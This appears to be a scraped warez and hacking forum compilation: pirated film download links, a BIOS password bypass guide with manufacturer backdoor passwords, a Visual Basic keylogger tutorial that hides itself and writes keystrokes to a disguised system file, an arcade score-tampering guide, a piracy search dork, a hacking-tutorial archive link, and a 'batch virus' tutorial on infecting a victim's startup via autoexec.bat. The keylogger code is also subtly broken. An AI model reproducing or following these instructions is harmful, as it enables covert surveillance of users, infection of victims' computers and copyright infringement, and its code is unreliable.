http://www.qshare.com/get/255242/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part2.rar.html
http://www.qshare.com/get/255243/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part3.rar.html
http://www.qshare.com/get/255244/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part4.rar.html
http://www.qshare.com/get/255234/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part5.rar.html
http://www.qshare.com/get/255245/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part6.rar.html
http://www.qshare.com/get/255239/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part7.rar.html
http://www.qshare.com/get/255231/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part8.rar.html

Uploaded
http://uploaded.to/file/y32op7/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part1.rar
http://uploaded.to/file/p0sbj9/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part2.rar
http://uploaded.to/file/qdbtyw/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part3.rar
http://uploaded.to/file/8lwxnz/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part4.rar
http://uploaded.to/file/m3b2kz/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part5.rar
http://uploaded.to/file/dt9rtz/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part6.rar
http://uploaded.to/file/mdegwp/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part7.rar
http://uploaded.to/file/uqc180/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part8.rar


MegaUpload
http://www.megaupload.com/?d=PQJTR5G9
http://www.megaupload.com/?d=KLHRD6TT
http://www.megaupload.com/?d=UMSSKLPI
http://www.megaupload.com/?d=O0O2LV9L
http://www.megaupload.com/?d=5YXHMZM0
http://www.megaupload.com/?d=VSADPI5R
http://www.megaupload.com/?d=TD1UGHXQ
http://www.megaupload.com/?d=85VCUUDE

Factoryfile
http://www.filefactory.com/file/628c4e/
http://www.filefactory.com/file/519de9/
http://www.filefactory.com/file/8d35ae/
http://www.filefactory.com/file/afb710/
http://www.filefactory.com/file/7ca3f7/
http://www.filefactory.com/file/81928e/
http://www.filefactory.com/file/39c851/
http://www.filefactory.com/file/11872c/

Angry IP Scanner 3.0

Click this bar to view the full image.


Angry IP scanner is fast and friendly network scanner for Windows, Linux, and Mac. It is very extensible, allowing it to be used for very wide range of purposes, with the primary goal of being useful to network administrators



Win32
http://rapidshare.com/files/123879917/ipscan-win32-3.0-beta1.exe.html
Mac
http://rapidshare.com/files/123880375/ipscan-mac-3.0-beta1_1_.zip.html
Linux
http://rapidshare.com/files/123880189/ipscan-linux-3.0-beta1.jar.html

Proxyshell Hide IP v2.4.1.0



ProxyShell Hide IP is a powerful proxy software to hide IP address when you surfing by intelligently managing and using multiple proxies, makes you surf anonymously, protects your personal information and internet privacy. With ProxyShell Hide IP, you can hide IP address, surf the web without anyone knowing who you are, hide your own information and reading interests. ProxyShell Hide IP could also bypass restrictions if your IP address is blocked, post on bbs or send email without displaying your own IP.

Key Features of ProxyShell Hide IPbr />
• Hide IP address to make you surf anonymously
• Unique algorithm to effectively use public proxy servers for surfing
• Use multiple proxies simultaneously to handle your surfing requests
• Intelligently optimize speed of multiple proxies, accelerate your surfing
• Automatically detect proxy errors and change proxies if necessary
• Totally automatic and easy-to-use




http://rapidshare.com/files/86088652...P_v2.4.1.0.rar

How to bypass bios password

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to Cr*ck the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either Cr*ck or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Make ur own keylogger

Make your own Keylogger

by SkZ

Well this might be usefull for some of you, depending on your Persona of keyloggers. You say you want to make your own, or interested on how to go about doing so, let me give you hand.. I will show you how .

Ok...I am assuming that you have a basic understanding as to how visual basic works and how to make programs, debug, and compile.

Ok. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to Start Logging
(if you want to make it start on startup...pm me or email me)
Now using api guide or just copying from here, declare a new function. the GetASyncKeyState function.

Code:
1: Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
2: (ByVal vKey As Long) As Integer
^---put this in the declarations section of the module.

That is all one line of code. Make sure its like that. and not split in 2.

Now you have a new function to use through your program.
ok...
Now we must make it be "invisible". Now im sorry but in Windows XP, I do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.

OK. In the button code..., in the click event of course...
type the following

Code:
1: app.taskvisible = false
2:form1.visible = false
3:form1.hide
4:timer1.enabled = true
'and also in the properties section of the form...change the shownintaskbar to false

Now when we click the button...it goes invisible.

Now we are going to need some variables....
Back in the declarations section declare the following...

Code:
1: Dim strLetter as String, strTotal as String
Now in the timer code put this. Ill explain afterward.
also set the interval to 1 and enabled to false

Code:
1: Private Sub Timer1_Timer()
2:
3:For I = 28 To 128
4:If GetAsyncKeyState <> 0 Then
5:
6:strLetter = Chr(I)
7:
8:
9:
10:'Now here you can add certain things
11:'so that instead of displaying
12:'retarded characters, it tells you
13:'what the user pressed. What I mean
14:'is if they press Enter/Return, it will
15:'Show some weird box. You dont want that
16:'so u make a select case about I for each
17:'button u want to customize. PM me or Email
18:'me for help on this part.
19:
20:
21:strTotal = strTotal & strLetter
22:
23:
24:End If
25:
26:Next I
27:
28: open "C:\Windows\SysResources.DAT" for output as #1
29:Print #1, strTotal
30:close #1
31:
32:End Sub
33:
34:
35:'End Code
36:
37:
Now all you have to do is when you want to check the keys pressed, open up C:\Windows\SysResource.DAT in notepad, and there it is.

Ahh, hope you all are keeping up with me so far .. ... One last thing for all the noobies out there, here's it is in lamen terms.

Code:
1:'BEGINNING
2: Dim strLetter As String, strTotal As String, old as string
3:Private Sub Command1_Click()
4:Timer1.Enabled = True
5:End Sub
6:Private Sub Form_Load()
7:Command1.Caption = "Start Loggin"
8:Timer1.Enabled = False
9:Timer1.Interval = 1
10:End Sub
11:Private Sub Timer1_Timer()
12:For I = 28 To 128 'ASCII code
13:If GetAsyncKeyState <> 0 Then
13:strLetter = Chr(I)
14:End If
15:If strletter <> Old Then
16:Old = strletter
17:strTotal = strTotal & old
18:End If
19:Next I
20:Open "C:\windows\SysResources.dat" For Output As #1
21:Print #1, strTotal
22:Close #1
23:End Sub
24:'ENDING
I think thats it besides the Module of course.

NOTE: Well there it is I hope you all enjoy. ...

Code:
PSS:Now we must make it be "invisible". Now im sorry but in Windows XP, I do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.

Hacking Flash arcades

Requirements:
1. Firefox
2. Tamper Data addon
3. A website with an arcade NOT HERE.
Steps:
1. Go to the game that you want to hack and start it up.
http://i202.photobucket.com/albums/a...sfb/tut1-1.jpg
2. Lose on the game or wait until the time runs out
http://i202.photobucket.com/albums/a...titled-1-7.jpg
3. Open Up tamper data then click "Start Tamper" Then on the game press submit score.

Click this bar to view the full image.

4.A box pops up then click Tamper
Click this bar to view the full image.


5. A box pops up look on the right for parameter value and look threw the text for "gscore"
Click this bar to view the full image.

6. change it to what you want and click ok
YOU HAVE SUCCESSFULLY HACKED A SCORE

Cracking xxx passes

This summary is not available. Please click here to view the post.

Google Exploit

Dont want to use limewire to get music?

enter this into the search box on google(Duh!), switch "change.this" to the name of the song you want (i.e. bleed it out)

intitle:"index.of" (mp4|mp3|avi) change.this -asp -htm -html -cf -jsp

200 hacking tutorials

This file contains about 200 hacking tutorials. Here is a sample list of many that are contained in the file:

Code:
-[ How to rip Dynamic Flash Template ]-.txt
10 reasons why PCs crash U must Know.txt
10 Security Enhancements.txt
16x Dvd+-rw Dl Dvd Writer Comparison Guide.txt
20 Great Google Secrets.txt
23 Ways To Speed WinXP, Not only Defrag.txt
250+ Tech books online.txt
2600 Hertz Single Tone Generator Schematic.txt
36 Graphics & Design Ebooks.txt
8 People Can Use The Same Msn Dial Up Account.txt
A Basic Guide to the Internet.txt
A Basic UNIX Overview.rtf
A BEGINNERS GUIDE TO Hacking Unix.txt
A Cracking Tutorial
A Guide to Internet Security- Becoming an Uebercracker.txt
A Guide to the Easiest Hacking there is.txt
A List of every TeleNet code that there is.txt
A List Of Government BBS Numbers.txt
A List Of Some OF The Most Useful UNIX Hacking Commands.htm
A Novice's Guide to Hacking 2004.txt
A Novice's Guide To Hacking.txt
A Short HACKER SPEAK Glossary.txt
A simple TCP spoofing attack.txt
A Small Guide to Hacking HOTMAIL.txt
A UNIX Hacking Tutorial.txt
A very small tut for RealMedia.txt
A Web Standards Checklist, How to make a proper website.txt
Accessing the bindery files directly.txt
Accessing The Entire Internet On Your 3 Phone, U8110, E616 etc..txt
Advanced Shellcoding Techniques.txt
All about ftp must read.txt
All About Movie Tags (what Is A Dvdrip, Cam Etc.).txt
ALL About Spyware.txt
All mIRC Commands.txt
Almost Everything You Ever Wanted To Know About Security (but.txt
An Architectural Overview of UNIX Network Security.htm
An Extensive Guide to Bell System Man Holes.txt
An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt
An Introduction into TeleScan.txt
An Introduction to Denial of Service.txt
An Introduction to the Computer Underground.txt
An Introductory Guide To TeleNet Commands.txt
Anarchist Cookbook 2004
Anonymity complete GUIDE.rtf
Anonymity of Proxy, Anonymity Of Proxy learn it insideout.txt
Anonymity.txt
ANONYMOUS emails.txt
Anonymous FTP FAQ.htm
ANSIBombs II Tips And Techniques.txt
anti leech hacking tutorial.txt
Area Codes and Time Zones.txt
attacks on networks how to stop.htm
Auto End Tasks to Enable a Proper Shutdown, Win XP Tweak.txt
Automatic Windows Installation, No keypress required!.txt
B.A. regedit.txt
Backdoor.txt
Backdoors.txt
Backtracking EMAIL Messages.txt
Bandwidth Explained!.txt
Basic Networking.txt
BBS CRASHING TECHNIQUES.txt
Becoming A Phreaker - The Quick n' Easy Way.txt
Beep Code Manual.txt
Beep Codes Error Codes.txt
Bell Hell Volume #1.txt
Bell Hell Volume #2.txt
Best Keyboard Shortcuts.txt
Big Brother And Ndisuio.sys, A new Internet phenomenon.txt
Bin & Cue Simple Tut.txt
BIOS Update Procedure.txt
Bit Torrent Tutorials.txt
Block Adservers.txt
Boot Block Recovery For Free.txt
Boot Winxp Fast.txt
Border And Text Effects In Psp8, For use with PSP8.txt
Breaker B0X.txt
Broken Ie, How to fix it.txt
BRUTE- A brute force approach to hacking Unix passwords.txt
Bulk Editing Of .xxx to .zip or .mp3.txt
BulletProof FTP Server Tutorial.txt
Burn .bin file Without A .cue file.txt
Burn a BIN without a CUE using NERO.txt
Burning Bin & Cue Using Nero.txt
Bust Avoidance For Dipshits.txt
busybox.txt
Bypass Internet Censorship.txt
Calculating Offsets.txt
cannot use my password to get back into Windows XP.txt
Cant See Secure Sites.txt
Caught A Virus.txt
Cellular Listening with a TV .txt
Cellular Telephone Phreaking Phile Series VOL 1.txt
Change Music In The Malibu And The Pole Position, GTA Vice Modders.txt
Change Text on XP Start Button.rtf
Change Text on XP Start Button.txt
Change The Default Location For Installing Apps.txt
Change The Storage Location Of 'my Documents', a bit safer for when your PC crashes....txt
Change Your Ip In Less Then 1 Minute.txt
Changing Default Location For Installing Apps.txt
Check For Dos, Check to see if you are infected..txt
Choosing A Good Domain Name, ya..good name is important!.txt
Choosing An Internet Merchant Account, nice info on Internet Merchant Account...txt
Clear Unwanted Items From Add And Remove.txt
Closing Open Holes, System Security How to close open holes.txt
Closing the Net.txt
CMD Prompt here, add to folder context menu windows xp.txt
COMMON FTP ERROR CODES.txt
Compression and Cracks for Dummies.txt
Computer Acronyms.txt
Computer Bulliten Boards and the Law.txt
Computer Chrime - Current Practices, Problems and Proposed So.txt
Computer eMail and Privacy.txt
Computer Hackers News Articles.txt
Computer Matinence.txt
Computer Rights vs First and Forth Amentment Right.txt
Computer Security.txt
Computer Security_2.txt
Computer Viruii.txt
Computerized Governmental Database Systems Containing Persona.txt
Configuring ZoneAlarm Pro Security Settings, A ZoneAlarm Pro Tutorial.txt
connect A Psx Pad To Pc, Warning soldering is involved...txt
Convert Stubborn Webpage To pdf.txt
Convert To Basic And Dynamic Disks In Windows Xp.txt
Converting Movies To Psp Format.txt
Converting to NTFS.txt
COPS and Robbers-Unix System Security.txt
COPY X BOX GAMES!.txt
Copyright Guides for Photographers.txt
Cracking Bios, use the followin' code.txt
Cracking Zip Password Files.txt
Crap Software Config Settings, How to set-up the firewall.txt
Crash Course in X Windows Security.txt
Create A Huge File.txt
Create A Personal Screen Saver In Win Xp!.txt
Create An Ftp Server On Your Pc With Serv-u.txt
Create Bootable Win XP SP1 CD(nero).txt
Create Bootable XP SP integrated CD.txt
Create One-click Shutdown And Reboot Shortcuts.txt
Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Crime and Puzzlement.txt
Cultural Formations in Text-Based Virtual Realties.txt
Cyberspace and the Legal Matrix- Laws or Confusion.txt
Dark Angel's Phunky Virus Writing Guide .txt
Data Capacity of CDs [Tutorial].txt
Debug, Learn how crack windows.txt
Defamation Liability of Computerized Bulliten Board Operators.txt
Delete An undeletable File.txt
Hacking Techniques.txt
Hacking TRW.txt
Hacking TYMNET.txt
Hacking Unix System V's.txt
Hacking VoiceMail Systems.txt
Hacking Wal-Mart Computers.txt
Hacking Webpages.txt
Hard drive Gone Bad.txt
Hardware Firewall.txt
Have Notepad In Send To.txt
have satallite tv for almost free IF not free!!!.txt
Hex, How to turn binary or decimal to hex.txt
Hide Drives and Partitions.txt
How 2 Find EVERYTHING uploaded on Rapidshare.txt
How BT phone cards works.txt
How do I overburn a CD with Nero.txt
How do I remove an extra operating system from by.txt
How do I Test My VirusScan Installation.txt
How Do U See Hidden Files, Using DOS...txt
How Download MP3s from Fanscape.com or other Streaming Audio-Video.txt
How Linux boots.txt
How Long Has Your XP System Been Running.txt
How Phone Phreaks are Caught.txt
How the Traditional Media Clasifications Fail to Protect in t.txt
How To Access Your Folders From Your Taskbar.txt
How To Add A Url Address Bar To The Taskbar.txt
How To Add An Option To Print, the Contents of a Folder!.txt
How To Add Your Own Windows Tips.txt
Speeding up your internet connection under Linux and Windows.html
Spoofing emails, via telenet.txt
Standard ASCII Character Set.txt
Steps to Clean Install XP.txt
Stop A Restart Process In 3steps.txt
Stop Annoying Pop-ups Without Pop-up Blockersoutli.txt
Summary of FBI Computer Systems.txt
SUNDEVIL.TXT
SUPREM~1.TXT
System Changes To Foil Hackers And Browser Hijacke.txt
System File Checker For Windows Xp.txt
TCP packet fragment attacks against firewalls and filters.txt
Tcpip A Mammoth Description, Short and easy-Everything U want to know.txt
Telenet-The Secret Exposed.txt
telnet trick port 25.doc
Testing Wattage Consumption Of Your Computer, Measuring your computer's wattage.txt
The ABC's of Payphones part 1.txt
The ABC's of Payphones part 2.txt
The ABC's of Payphones part 3.txt
The ABC's of Payphones part 4.txt
The Antivirus Defense-in-Depth Guide.txt
The Basics of Hacking- Introduction.txt
The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt
ThE Beige BoX .txt
The Constitution in Cyberspace.txt
The Cracking Manual.txt
The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt
The Electronic Communication Privacy Act of 1986 - A Laymans .txt
The Greatest Hacker of all time.ASC
The Hacker's League.txt
The History of British Phreaking.htm
The Inner Circle Book's Hacking Techniques.txt
The Lamahs-Guide to Pirating Software on the Internet.txt
The M.M.C. Guide to Hacking, Phreaking, Carding.txt
The Modern Phreakers Guide To Beige Boxing.txt
The Modern Phreakers Guide To Payphones.txt
The Moterola Bible.txt
The Myth of the 2600Hz Detector .txt
The National Information Infrastructure-Agenda for Action.txt
The Newbies Handbook- ' How to beging in the World of Hacking.txt
The Newbies-User's Guide to Hacking.txt
The Official Phreaker's Manual.txt
The Phreakers Handbook-1.txt
The Port Guide, Port number and info.txt
The Pre-History of Cyberspace.txt
The Price of Copyright Violation.txt
The REAL way to hack RemoteAccess.txt
The Secret Service, UUCP,and The Legion of Doom.txt
The Telephone Works.txt
The Ultimate Guide To Installing Windows Xp Sp2.txt
The Ultimate Phreaking Guide .txt
the UNIX operating system (Berkley 4.2).txt
Theft of Computer Software-A National Security Threat.txt
Thoughts on the National Research and Education Network.txt
Three Ways Of Bypass Starforce Cd Protection.txt
Tip for shutdown windows - virus.txt
Tips And Tricks, Windows XP.txt
Tips on Starting Your Own BBS.1
Tired Of Reinstalling Windows.txt
To Get And Show The Ip Via Javascript.txt
Top 5 Myths About Safe Surfing, PC Magazine.txt
Transferring Data.txt
Translating Binary To Text.txt
Translating Binary to Text2.txt
Trojan Ports.txt
Turn MSN Messenger Display Pix into User Pix on XP.txt
Winxp System Response, reboot whitout rebooting.txt
Winxp Tips And Tricks, Winsock 2 repair.txt
Xp Auto Install.txt
Xp Folder View Does Not Stay To You're Setting., Grab your registry editor and join in.txt
XP REPAIR INSTALL.txt
XP Tweaking.txt
Yahoo + geocities Posts.txt
Yahoo Chat Commands how to.rtf
Yahoo Messeger, no ad's.txt
You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt
Your Home Page Nevr Being Changed.txt
Your Own Home Server - Introduction.txt
Zen and the Art of Fone Phreaking `97 .txt
DOWNLOAD
Code:
http://rapidshare.com/files/119890717/200_Hacking_Tutorials.rar

How to make a batch virus [Tutorial]

--------------------------
A noobs guide to:
How to make a batch virus
Part1
--------------------------

I made this tutorial with ms word for windows 98 users,
but most of the information here will work on all window versions.
--------------------------

This tutorial is for educational purposes only and is not to be used in any illegal way. The author of this tutorial/website is not responsible for any damage caused by this tutorial. No one is forcing you to read this so if you do not accept the terms of this disclaimer please leave the site now.
You can send this tutorial to your friends or put it on your website as long as you keep the title box with the name "netkid03" on it and do not modify it. Use it for to educate you and others in computers, and don’t use it in any other way.
--------------------------

Introduction

Ok, so you want to make a virus? Well batch is the easiest language to use. Below is a definition of batch and virus so you know exactly what this tutorial is about.

http://www.webopedia.com/TERM/B/batch_file.html

“A file that contains a sequence, or batch, of commands. Batch files are useful for storing sets of commands that are always executed together because you can simply enter the name of the batch file instead of entering each command individually.
In DOS systems, batch files end with a.BAT extension. For example, the following DOS batch file prints the date and time and sets the prompt to GO>:
date
time
prompt [GO>]

Whenever you boot a DOS -based computer, the system automatically executes the batch file named AUTOEXEC.BAT, if it exists.

Many operating systems use the terms command file or shell script in place of batch file.”

http://www.webopedia.com/TERM/v/virus.html

“A program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are manmade. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.
Since 1987, when a virus infected ARPANET, a large network used by the Defence Department and many universities, many antivirus programs have become available. These programs periodically check your computer system for the best-known types of viruses.
Some people distinguish between general viruses and worms. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.”

So now you know what a batch file is and what a virus is I will explain what a batch virus is.
“A batch virus is a simple program that uses dos commands and runs in a dos prompt window. It is run as soon as the user opens it and can be set to run when your victim starts up their p.c. It causes damage to the victims computer and in some cases can spread to other computers.”

From the Beginning

Ok in this I will describe some basic dos commands and how to use them. Firstly open a text editor (I think notepad is the best text editor to use and it comes free with windows, click start run and type in notepad) Ok now this tool is were you will be making all your batch files from now on. If your are use to using dos then this should be easy for you as most of the commands are simply dos commands. Now type this in your text editor:
CODE
@echo off
echo Hello I’m your first batch file

Now save the file as “Untitled.bat” (you must save all your batch files as .bat for them to work).

Open the file you have just created and you should see a dos prompt box put up that says, Hello I’m your first batch file, now I’m going to explain line by line how this code works. The first line (@echo off) is used to turn echo off which basically means it doesn’t display everything else that is going on but just shows things you have chosen to display on screen. You may be wondering why it’s @echo off and not just echo off well the ‘@’ turns echo off just for the line you have put it on so it stops the dos prompt box from displaying ‘echo off’ you can test this code for your self without the @echo off to see what I mean. The second line uses the ‘echo’ command to display ‘Hello I’m your first batch file to the screen’ when ever you want to display text you need to use the echo command, it will not work if you don’t! Well done you (hopefully) have just made and understood your first batch program, (that wasn’t so hard was it?)

Laying out your batch files

If your code doesn’t work but it’s laid out neatly you will be able to quickly find the problem and fix it. A good way to lay out you code is to use labels and the ‘goto’ command here is an example of how to use labels/goto command

CODE
@echo off

:start
echo hello
goto next

:next
echo this text is in the ‘next’ secton
goto end

:end
echo and this code is in the ‘end’ section

This is a simple batch file using labels and goto commands. The labels start off with colon (smile.gif and the goto commands are simply
‘goto (the name of your label)’. Note: you do not need to use a colon in goto commands. You don’t have to put your labelled sections in order, the code would work exactly the same if the ‘end’ section was in-between the ‘start’ and ‘next’ section. This is because the goto commands tell the code exactly were it should go next. It would be useful if you experiment with this and see what happens when you switch them round.

Loops

But this isn’t all you can do with the goto command. One of the main uses of labels and using the goto command are loops. Loops are pices of code that keep repeating them self in a loop. E.g.

CODE
@echo off
:loop
echo I’m a loop
goto loop


The result of that simple code is show below…



You can place anything in a loop and it will keep going forever (or until the computer crashes).


The If, elif and else commands

So now you know how to make a basic loop, but what if you wanted your loop to keep going until something happens and then do something else? Well you could place a if command in the loop, this will make the loop keep going but if something happens then it will go somewhere else in your code. So lets add to are loop we made before.

CODE
@echo off
:loop
if exist c:\AutoExec.bat goto autoexec
else
echo You don’t have autoexe
goto loop

:autoexec
echo you have autoexec
goto loop

I compiled it (made it into a batch file) and opened it and this is what happened.


If you want to use else and if combined then you can use the elif command. Here is an example:

CODE
@echo off
:loop
if exist c:\AutoExec.bat goto autoexec
elif exist c:\windows goto windows
else
echo You don’t have autoexec.bat and you don’t have a windows folder
goto loop

:autoexec
echo you have autoexec
goto loop

:autoexec
echo you have a windows folder but you don’t have autoexec.bat
goto loop


autoexec and startup

To make a successful virus it’s a good idea to make the virus startup when your victim turns on there computer. This will keep there computer infected and make it harder for them to remove. There are a number of ways you can do this. Firstly you could add your virus code to the end of autoexec.bat. In windows autoexec starts up before windows loads. There are some advantages and some disadvantages to this. The main advantage is it’s one of the first files there computer will load and the main disadvantage is it loads before windows meaning any window commands like opening up a windows file or anything like that wont work. To add your virus to the end of autoexec simply type this somewhere in your batch file:
CODE
echo copy %0 >> c:\autoexec.bat
%0 will automatically replace itself with your viruses root/name which means it doesn’t mater were your victim downloads/moves your virus will still work. If you want to copy a different batch file to autoexec then just use this code:
CODE
echo copy C:\filename\batchfile.bat >> c:\autoexec.bat
just replace “C:\filename\batchfile.bat” with the root to a batch file. If you don’t want to copy your whole batch virus to autoexec and just want to copy a few commands then you can use this code:
CODE
echo rem this is were you type what you want to copy >> c:\autoexec.bat
just replace “rem this is were you type what you want to copy” with any batch commands you want to put on the end of autoexec.

So, now you know how to add your virus to autoexec I will show you another way. Using the windows startup folder. This method also has some disadvantages and advantages. The main advantage is you can use all batch commands in it and open windows programs, the main disadvantage is it is easy for your victim to remove your virus from the startup folder as it is in there start menu. To add your code to this folder simply add this to your batch file:
CODE
